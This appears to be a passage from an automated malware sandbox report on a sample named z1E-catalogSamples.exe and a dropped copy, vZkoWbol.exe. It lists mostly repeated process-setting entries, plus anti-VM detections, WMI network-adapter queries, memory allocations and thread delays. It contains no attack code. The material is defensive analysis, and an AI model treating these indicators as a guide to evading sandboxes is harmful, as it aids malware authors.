                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Yara detected AntiVM3
                      Source: Yara matchFile source: Process Memory Space: z1E-catalogSamples.exe PID: 4856, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: vZkoWbol.exe PID: 6460, type: MEMORYSTR
                      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeMemory allocated: 1610000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeMemory allocated: 3140000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeMemory allocated: 3070000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeMemory allocated: 65C0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeMemory allocated: 75C0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeMemory allocated: 7800000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeMemory allocated: 8800000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeMemory allocated: 2F50000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeMemory allocated: 3200000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeMemory allocated: 2F50000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeMemory allocated: 1790000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeMemory allocated: 31C0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeMemory allocated: 1790000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeMemory allocated: 6640000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeMemory allocated: 7640000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeMemory allocated: 7880000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeMemory allocated: 8880000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeMemory allocated: 13D0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeMemory allocated: 30E0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeMemory allocated: 2F10000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeThread delayed: delay time: 600000Jump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeThread delayed: delay time: 599890Jump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeThread delayed: delay time: 599781Jump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeThread delayed: delay time: 599671Jump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeThread delayed: delay time: 599562Jump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeThread delayed: delay time: 599438Jump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeThread delayed: delay time: 599328Jump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeThread delayed: delay time: 599219Jump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeThread delayed: delay time: 599109Jump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeThread delayed: delay time: 599000Jump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeThread delayed: delay time: 598890Jump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeThread delayed: delay time: 598781Jump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeThread delayed: delay time: 300000Jump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeThread delayed: delay time: 299875Jump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeThread delayed: delay time: 299766Jump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeThread delayed: delay time: 299656Jump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeThread delayed: delay time: 299547Jump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeThread delayed: delay time: 299438Jump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeThread delayed: delay time: 299313Jump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeThread delayed: delay time: 299188Jump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeThread delayed: delay time: 299063Jump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeThread delayed: delay time: 298953Jump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeThread delayed: delay time: 298844Jump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeThread delayed: delay time: 298719Jump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeThread delayed: delay time: 298610Jump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeThread delayed: delay time: 298485Jump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeThread delayed: delay time: 298360Jump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeThread delayed: delay time: 298235Jump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeThread delayed: delay time: 298110Jump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeThread delayed: delay time: 297985Jump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeThread delayed: delay time: 297860Jump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeThread delayed: delay time: 297735Jump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeThread delayed: delay time: 297610Jump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeThread delayed: delay time: 297484Jump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeThread delayed: delay time: 297375Jump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeThread delayed: delay time: 297266Jump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeThread delayed: delay time: 297156Jump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeThread delayed: delay time: 297047Jump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeThread delayed: delay time: 296937Jump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeThread delayed: delay time: 296828Jump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeThread delayed: delay time: 296719Jump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeThread delayed: delay time: 296594Jump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeThread delayed: delay time: 296484Jump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeThread delayed: delay time: 296375Jump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeThread delayed: delay time: 296266Jump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeThread delayed: delay time: 296156Jump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeThread delayed: delay time: 296047Jump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeThread delayed: delay time: 295935Jump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeThread delayed: delay time: 295828Jump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeThread delayed: delay time: 295719Jump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeThread delayed: delay time: 295609Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeThread delayed: delay time: 600000
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeThread delayed: delay time: 599876
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeThread delayed: delay time: 599750
